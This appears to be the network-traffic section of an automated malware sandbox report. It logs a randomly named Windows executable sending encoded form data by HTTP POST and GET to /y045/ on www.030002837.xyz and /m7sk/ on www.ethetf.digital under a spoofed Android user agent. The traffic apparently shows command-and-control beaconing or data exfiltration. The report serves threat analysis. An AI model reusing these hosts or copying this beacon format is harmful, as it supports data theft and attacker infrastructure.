                                                                                        Oct 9, 2024 12:54:20.206110954 CEST1038INHTTP/1.1 302 Found
                                                                                        Connection: close
                                                                                        content-type: text/html
                                                                                        content-length: 771
                                                                                        date: Wed, 09 Oct 2024 10:54:20 GMT
                                                                                        cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                        location: http://www.030002837.xyz/cgi-sys/suspendedpage.cgi
                                                                                        vary: User-Agent
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 [TRUNCATED]
                                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        40192.168.2.224920365.21.196.90801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:54:22.085834980 CEST2472OUTPOST /y045/ HTTP/1.1
                                                                                        Host: www.030002837.xyz
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en
                                                                                        Origin: http://www.030002837.xyz
                                                                                        Referer: http://www.030002837.xyz/y045/
                                                                                        Content-Length: 3625
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=0
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Data Raw: 6a 6e 51 58 3d 2f 33 70 69 34 56 64 6f 44 39 37 32 4b 42 75 59 61 4f 6a 4c 4e 69 65 58 30 44 48 35 58 45 30 79 6d 76 77 44 4d 65 39 56 6c 57 55 67 37 72 52 75 44 6c 76 58 42 6e 45 43 62 50 72 4e 30 5a 41 68 42 73 44 6d 32 6d 48 4e 2f 46 7a 41 49 71 63 63 62 32 70 4e 53 30 32 4d 33 52 35 51 6b 45 6f 4d 44 37 77 75 66 74 58 6f 67 31 56 72 67 52 65 36 32 38 6c 30 69 68 39 6b 4f 79 50 75 38 61 72 4b 33 57 70 75 6a 4f 33 52 6c 42 2f 2f 64 32 63 6c 4f 53 5a 4c 73 43 62 64 6f 33 32 4b 34 53 41 45 70 2f 41 34 39 69 49 4a 4c 61 37 76 77 64 46 41 77 49 48 6a 73 65 55 66 34 63 63 37 44 6c 6b 38 4a 63 48 51 58 4a 65 36 44 6e 51 53 2b 54 42 41 47 62 5a 2f 55 4d 58 44 32 59 43 55 62 51 6a 33 36 2b 72 68 4d 66 51 4f 74 55 6b 53 54 61 31 6c 65 53 67 48 32 54 48 69 69 6f 4d 53 4e 6f 45 4a 49 54 74 77 37 74 4b 41 71 66 31 50 51 74 39 71 4a 77 69 4d 31 32 63 46 44 62 70 4a 45 6e 69 44 75 5a 2b 4f 79 7a 30 4c 4c 33 6b 42 34 4c 39 6e 75 56 48 51 79 32 69 5a 6e 70 4d 46 6b 38 71 6c 4e 34 62 5a 4f 50 55 4d 2b 77 2f 65 34 [TRUNCATED]
                                                                                        Data Ascii: jnQX=/3pi4VdoD972KBuYaOjLNieX0DH5XE0ymvwDMe9VlWUg7rRuDlvXBnECbPrN0ZAhBsDm2mHN/FzAIqccb2pNS02M3R5QkEoMD7wuftXog1VrgRe628l0ih9kOyPu8arK3WpujO3RlB//d2clOSZLsCbdo32K4SAEp/A49iIJLa7vwdFAwIHjseUf4cc7Dlk8JcHQXJe6DnQS+TBAGbZ/UMXD2YCUbQj36+rhMfQOtUkSTa1leSgH2THiioMSNoEJITtw7tKAqf1PQt9qJwiM12cFDbpJEniDuZ+Oyz0LL3kB4L9nuVHQy2iZnpMFk8qlN4bZOPUM+w/e4iezq49I2BD9PasZA+9UJDJQm+zH3wOvKQUQ/WsO6BJ/fJkPf5y+sA+JJ5ZV1lcFDnKV6SrR5rpT3rD/PJckPT5N3KrfJjf+/fK1B3t0Dul87DfJrECMyy9P9Hx7XmvIFr/Zo8r6q0XvR6bYjQftURzLi30iu06c72g9hFRdJU09xQWj0U8qnWvrKOg9kxsNS0Ak1AnEm0Nkwvsy0IQyY/rZRnlt2cnyatafgHrL8YqncxODhjf3QIVG4BHw8Beg3pH/7M85uha4HFpRl8g29Y+akcnXr8iNht44AeHkgpxNSY9NmdhdfSuY2bTsts24XzyyDfJqmUQKnaW5klmX42J/RSxT6nkXzjQ2575xgIQ7DFy2znInV7SPtp4S8E7xDh7ZWgArio4InXBgxNCkQl+971eQR6uuXWx9qhi3us9ycEJ5l+miIYIfrTQg3VSrJBIzRSevlRkfxep4GCU+RSU4qzOso5irbhOAMdEBUhD/EsUwQihdw/EVKmVWzTYOLkhaCTJnGsR7AkqTQb0j0BNP2x0t+JC9BYNKET+GncfAkNtvp7kRuv2upFigUi3DkLF1dH6Sj0dyEPy2kIJkdVlYbCrQm2VzspIz2EWwVVa/fA73Szj1h4kKvTq47TBXDidG/DCklzjN+CHpawVTB5PyKlunHBrcoxu [TRUNCATED]
                                                                                        Oct 9, 2024 12:54:22.091367960 CEST1695OUTData Raw: 35 44 32 7a 41 56 53 51 4c 49 2f 6c 64 67 56 4d 4a 53 58 71 2f 69 58 46 69 39 68 47 62 41 72 33 32 50 31 46 4b 36 70 31 72 70 6c 68 7a 65 6a 75 30 4f 57 74 39 4a 38 49 47 58 70 47 33 2b 4f 67 71 69 5a 62 4e 74 36 50 36 41 5a 4c 61 57 2f 7a 38 2f
                                                                                        Data Ascii: 5D2zAVSQLI/ldgVMJSXq/iXFi9hGbAr32P1FK6p1rplhzeju0OWt9J8IGXpG3+OgqiZbNt6P6AZLaW/z8/ThOrPzMgOGKa5m7zSdGuRfCbsjavYDwTI0aoah1bZD7uWuRch4x8rSwGfFJZF2ewr12FgVEY/azFizb5w805j9NDDaW/zB23wPzi47iCNWrZB1jAyM9pztABreODGgDY1Vvw6GemyIHE/0IQpm9yQfAyzjC8vV3ZH
                                                                                        Oct 9, 2024 12:54:22.880673885 CEST1038INHTTP/1.1 302 Found
                                                                                        Connection: close
                                                                                        content-type: text/html
                                                                                        content-length: 771
                                                                                        date: Wed, 09 Oct 2024 10:54:22 GMT
                                                                                        cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                        location: http://www.030002837.xyz/cgi-sys/suspendedpage.cgi
                                                                                        vary: User-Agent
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 [TRUNCATED]
                                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        41192.168.2.224920465.21.196.90801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:54:24.627408028 CEST475OUTGET /y045/?op9=BLtTm0V&jnQX=y1BC7gE5U9SjKVi7QbOvAwWuygTbNwJMs/YJXs1dmV0xz4NUECnrSGc1HY+X/o4eGLvG/kHjylnkJsIYeylKQW6IjjpW3QwsGL9rSqTC02R0siCnxO5Xuy1NPmql HTTP/1.1
                                                                                        Host: www.030002837.xyz
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Language: en-US,en
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Oct 9, 2024 12:54:25.290421009 CEST1180INHTTP/1.1 302 Found
                                                                                        Connection: close
                                                                                        content-type: text/html
                                                                                        content-length: 771
                                                                                        date: Wed, 09 Oct 2024 10:54:25 GMT
                                                                                        cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                        location: http://www.030002837.xyz/cgi-sys/suspendedpage.cgi?op9=BLtTm0V&jnQX=y1BC7gE5U9SjKVi7QbOvAwWuygTbNwJMs/YJXs1dmV0xz4NUECnrSGc1HY+X/o4eGLvG/kHjylnkJsIYeylKQW6IjjpW3QwsGL9rSqTC02R0siCnxO5Xuy1NPmql
                                                                                        vary: User-Agent
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 [TRUNCATED]
                                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        42192.168.2.224920515.197.148.33801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:54:30.335201979 CEST2472OUTPOST /m7sk/ HTTP/1.1
                                                                                        Host: www.ethetf.digital
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en
                                                                                        Origin: http://www.ethetf.digital
                                                                                        Referer: http://www.ethetf.digital/m7sk/
                                                                                        Content-Length: 2161
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=0
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Data Raw: 6a 6e 51 58 3d 4e 34 59 6a 6e 62 65 42 73 61 49 43 5a 42 39 58 4b 78 55 32 5a 51 4e 43 7a 4f 44 73 57 75 69 45 48 39 54 6d 37 4c 70 67 64 70 79 53 2b 37 74 2b 33 33 63 6e 4b 6e 77 49 75 4c 36 36 75 47 59 35 34 69 58 72 6f 41 4b 36 6c 61 2f 6f 45 6b 7a 61 42 38 44 5a 35 2f 6e 79 72 4e 4d 4b 75 31 70 2b 6f 4e 30 7a 47 64 69 31 70 4a 35 66 30 37 6e 78 4e 76 57 30 62 34 73 63 54 37 76 45 78 75 75 33 4b 49 68 6c 5a 66 56 72 75 4a 30 37 2b 75 36 34 76 57 53 41 6e 32 55 42 61 62 37 68 75 70 72 37 6a 4f 4f 6e 66 58 78 2b 70 70 78 4e 76 48 71 47 79 44 4f 54 79 78 31 38 69 7a 66 39 54 59 54 62 76 31 4d 39 59 55 43 34 75 32 58 58 4f 53 39 4b 64 4f 53 49 45 71 59 5a 45 57 69 53 4f 58 70 67 71 44 66 6e 71 56 37 46 73 31 33 68 68 54 78 6e 66 36 66 6f 72 72 46 31 6a 70 75 6e 62 6c 33 67 56 41 5a 69 33 50 52 38 75 41 62 41 6a 6c 44 4a 67 4a 34 4a 56 46 52 6d 66 50 6a 46 62 67 42 62 5a 51 76 57 57 44 5a 79 70 72 46 79 46 44 59 43 4a 55 41 67 66 4b 6b 7a 54 42 38 68 45 56 76 6a 31 37 62 4d 4e 63 41 55 43 6c 56 43 76 [TRUNCATED]
                                                                                        Data Ascii: jnQX=N4YjnbeBsaICZB9XKxU2ZQNCzODsWuiEH9Tm7LpgdpyS+7t+33cnKnwIuL66uGY54iXroAK6la/oEkzaB8DZ5/nyrNMKu1p+oN0zGdi1pJ5f07nxNvW0b4scT7vExuu3KIhlZfVruJ07+u64vWSAn2UBab7hupr7jOOnfXx+ppxNvHqGyDOTyx18izf9TYTbv1M9YUC4u2XXOS9KdOSIEqYZEWiSOXpgqDfnqV7Fs13hhTxnf6forrF1jpunbl3gVAZi3PR8uAbAjlDJgJ4JVFRmfPjFbgBbZQvWWDZyprFyFDYCJUAgfKkzTB8hEVvj17bMNcAUClVCv67Dxfi08tSgoS3TSdvFsup+IoN6fC0vD1am6FJI+5cmDmgUuInTOblVc3ba0aH8+4bZWyip83eUjcqeZrrHCtlk8paCnlz+BZkK2c7LDxYcJDn6xa11tRtBxSC85rnSZhHBc5QEISNmyOaWad9wLKydmvyP4/2d/+853gK5hgWqMAg/FGubxEyiOfgDW77LJBlir49T0NcOlNf1JwH9Fkwqm+ChH1QvE758e1gBOjtb05D7uvn5es0bhGv25IIAy0c6F1mEzUdrcumuGuSvK210z1boEQAkJX8cwefdBMekJre/OAEnlSfU3Bei0I7qWnv0TNv4zq+y19WVPB1k36haL+pYLpqqYIxXoEfWrOsMQ0HY/jKujg9xCC++zk3pmLMMmHjghhJ7XMyluHlZDt4dpOQlb8MDiv7OOEyj3F3g8QZyAhx9bAWHfpIhI2HFAd1X/RBmQ/kZcUbDc6NRUT3b0V7vGgWjCeH4/gYfUgNMrgnEeSxWI0vhQo9zzWjsh74AWhBZSrTLS7D9aPfKs4yjxprwVxyiGqz8uH5Go9iy8awWiF5cwVPWaq0CsAIdvPnZrt2jwaWAnar9DH3HC6x9IEJmtEVdO5fXz1MmM9nzNjY7OPJn1eVu2c6WcsUA0BZlpFpWoGf0zPtC+QynyUQlF5Jagp+dL0B [TRUNCATED]
                                                                                        Oct 9, 2024 12:54:30.340626001 CEST234OUTData Raw: 76 4f 70 2b 4a 37 5a 48 62 53 64 6f 77 76 79 79 79 6a 56 4d 46 32 58 35 56 31 73 44 58 67 52 4e 74 64 45 65 35 41 51 47 6f 37 65 2f 4f 78 55 68 56 42 33 4e 31 33 54 36 78 38 35 54 4a 44 55 44 4d 49 39 4d 56 41 4d 4d 69 41 50 6c 4b 54 37 68 34 36
                                                                                        Data Ascii: vOp+J7ZHbSdowvyyyjVMF2X5V1sDXgRNtdEe5AQGo7e/OxUhVB3N13T6x85TJDUDMI9MVAMMiAPlKT7h46Jr9WLQWbV4OAC3G/WXZqqumNRBKcyJYstrJdAeDLRJfmba98ooVsqN42towUuHP0K5VD1993mRp4pPfrWDaWnrka+Q8GbvaMWIyD+gE4bTjICEoO0CtJOeLuDWAodCztNJ7mZIGddZYNVvmbRVkPatX4


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        43192.168.2.224920615.197.148.33801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:54:32.867011070 CEST745OUTPOST /m7sk/ HTTP/1.1
                                                                                        Host: www.ethetf.digital
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en
                                                                                        Origin: http://www.ethetf.digital
                                                                                        Referer: http://www.ethetf.digital/m7sk/
                                                                                        Content-Length: 201
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=0
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Data Raw: 6a 6e 51 58 3d 4e 34 59 6a 6e 62 65 42 73 61 49 43 5a 43 46 58 4d 6a 73 32 57 51 4e 43 2b 75 44 73 50 65 69 43 48 39 66 59 37 4b 74 77 64 2b 57 53 37 2f 70 2b 32 45 30 6e 4a 6e 77 50 6d 72 36 2b 78 57 59 73 34 69 58 5a 6f 46 71 36 6c 5a 44 6f 57 79 2f 61 56 4f 37 59 6c 66 6e 77 2b 64 4d 4c 75 31 6c 4e 6f 4e 34 46 47 63 4b 31 70 4b 64 66 6c 4c 33 78 4a 4b 4b 30 58 6f 74 32 56 37 76 49 78 75 69 59 4b 49 78 74 5a 65 70 72 75 59 59 37 2b 2b 61 34 2b 78 47 41 73 57 55 56 43 4c 36 53 72 4c 75 68 6d 63 4b 46 65 6d 52 4f 6f 4b 64 78 6e 30 58 4b 2b 68 47 70 31 7a 52 6f 6a 32 69 6f 53 62 43 2f 38 67 3d 3d
                                                                                        Data Ascii: jnQX=N4YjnbeBsaICZCFXMjs2WQNC+uDsPeiCH9fY7Ktwd+WS7/p+2E0nJnwPmr6+xWYs4iXZoFq6lZDoWy/aVO7Ylfnw+dMLu1lNoN4FGcK1pKdflL3xJKK0Xot2V7vIxuiYKIxtZepruYY7++a4+xGAsWUVCL6SrLuhmcKFemROoKdxn0XK+hGp1zRoj2ioSbC/8g==


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        44192.168.2.224920715.197.148.33801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:54:35.586138010 CEST2472OUTPOST /m7sk/ HTTP/1.1
                                                                                        Host: www.ethetf.digital
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en
                                                                                        Origin: http://www.ethetf.digital
                                                                                        Referer: http://www.ethetf.digital/m7sk/
                                                                                        Content-Length: 3625
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=0
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Data Raw: 6a 6e 51 58 3d 4e 34 59 6a 6e 62 65 42 73 61 49 43 59 6e 4e 58 4b 43 73 32 65 51 4e 42 78 4f 44 73 57 75 69 47 48 39 54 59 37 4c 70 67 64 73 61 53 2b 34 31 2b 32 6e 63 6e 45 48 77 50 67 72 36 36 75 47 59 36 34 69 54 37 6f 41 47 45 6c 66 7a 6f 45 68 48 61 42 39 44 5a 78 66 6e 79 30 39 4d 49 75 31 6c 45 6f 4e 6f 5a 47 63 2f 75 70 4b 56 66 6d 35 66 78 41 61 4b 72 4f 59 74 32 56 37 76 50 78 75 6a 4c 4b 49 70 31 5a 61 73 75 75 4a 49 37 35 65 36 34 34 57 53 42 75 57 55 5a 65 62 37 56 75 6f 58 4b 6a 4f 4f 5a 66 58 6c 48 70 6f 4e 4e 67 30 79 47 79 43 4f 51 35 42 31 37 39 6a 66 39 58 59 54 6a 76 31 4d 58 59 55 43 34 75 32 72 58 63 79 39 4b 64 4d 36 4c 5a 61 59 5a 4a 32 6a 4e 45 33 6b 47 71 44 36 47 71 56 71 79 73 43 76 68 69 56 6c 6e 4a 61 66 6f 69 37 46 7a 6a 70 75 2b 52 46 33 43 56 42 39 51 33 50 42 73 75 41 62 41 6a 6d 37 4a 32 4c 51 4a 63 31 52 6d 57 76 6a 45 56 41 42 59 5a 51 6a 30 57 41 46 79 70 71 64 79 48 78 51 43 65 6d 6f 6a 48 71 6b 79 5a 68 38 6e 41 56 75 35 31 37 57 72 4e 63 59 74 43 6b 6c 43 76 [TRUNCATED]
                                                                                        Data Ascii: jnQX=N4YjnbeBsaICYnNXKCs2eQNBxODsWuiGH9TY7LpgdsaS+41+2ncnEHwPgr66uGY64iT7oAGElfzoEhHaB9DZxfny09MIu1lEoNoZGc/upKVfm5fxAaKrOYt2V7vPxujLKIp1ZasuuJI75e644WSBuWUZeb7VuoXKjOOZfXlHpoNNg0yGyCOQ5B179jf9XYTjv1MXYUC4u2rXcy9KdM6LZaYZJ2jNE3kGqD6GqVqysCvhiVlnJafoi7Fzjpu+RF3CVB9Q3PBsuAbAjm7J2LQJc1RmWvjEVABYZQj0WAFypqdyHxQCemojHqkyZh8nAVu517WrNcYtCklCv4jDitK08dSjvS3XWdzRsuhcIoBAfH8vDkamtxpPnZcgGmgelomsObR3c1ja0O78/7DZHziq6HfSncqzTLqeCtwx8oqSnQ3+ApkK3/TKPBYZAjno760ytRt/xWaW553SZivBcvEEISN5k+aQNN5SLK+Zmvef466d/PM53l+5ogWqLAgkPmuVxCeYOdgTWKfLKi9ip+BT9NcI29f4GQHaFkgqm6PkH0kvBvl8eUgBXztH8ZCjuvnDes4fhG/m5KcAy1c6MUmEpkdqaumiReSiK28qz03OERIkYGcc/MndAseqW7e/HgEFlRup3Ayy0JzqXSL0Gduu/K/A5dWWYx073+FaL+1YLqqqY/dX+nHWp+tqU0HCxD2OjgsACGmUzmDp86MMlC3h/BJxcsyVqHlhDt4RpMg1bJ4Di+bODFyg/F3nlAZpEhxzbAHQfrUILHLFAetX4ipmQPkZcUbAc6MWUT7x0ULVGgWjBvH4/SgfaANJpgnbJCwVI0rXQolVzW/sguMAWhBWPrTEILD8aPD9s4zyxpnwATeiE578vkBGsdiy7awZ315BwVPGavEosBIdu7rZnIagvaW72KqlJn7cC69lIGlmqzVdOofXzlMmG9nwZzZ8AvEk1eIB2ZeGcZkA229lrCFV1Wf1+vtA+Q2qySI9F6Yngq+dOkB [TRUNCATED]
                                                                                        Oct 9, 2024 12:54:35.591212034 CEST1698OUTData Raw: 76 34 70 39 56 37 5a 45 7a 53 64 76 4d 76 31 43 79 73 5a 63 46 33 49 35 56 32 6d 6a 58 47 52 4e 73 73 45 61 78 6d 51 46 6b 37 65 73 32 78 58 51 56 42 32 39 31 74 4a 4b 78 6a 39 54 55 65 55 44 41 50 39 4f 39 71 5a 70 75 41 4f 58 43 54 74 69 51 36
                                                                                        Data Ascii: v4p9V7ZEzSdvMv1CysZcF3I5V2mjXGRNssEaxmQFk7es2xXQVB291tJKxj9TUeUDAP9O9qZpuAOXCTtiQ6NL9LHwXbV4K4C3XeWWJArfaNRxKc2LAr7bJfI+CJRJfObal4oppGqPY2trYU8nP7IJVF099hmR1RpPHVWDKWnuUakwsGTPaMJ4zJwAEhGjvLCExEu0l6ALzUPywqZQzXJ6jLWsSUQ7cRVuOSOjQycprw3jxo84IMN


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        45192.168.2.224920815.197.148.33801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:54:38.120285034 CEST476OUTGET /m7sk/?jnQX=A6wDktXN+q8LbGsFPTQ5fgxpwOHTOb7uN87t6JZMO+a4oYZs/QR9CToB2Y/CtBMOuGHP8Si8k7ziAUqpJpPf4pft+7Iw80pztuVlLOvkrpZ1moT/MaasSpctb8+L&op9=BLtTm0V HTTP/1.1
                                                                                        Host: www.ethetf.digital
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Language: en-US,en
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Oct 9, 2024 12:54:38.869396925 CEST396INHTTP/1.1 200 OK
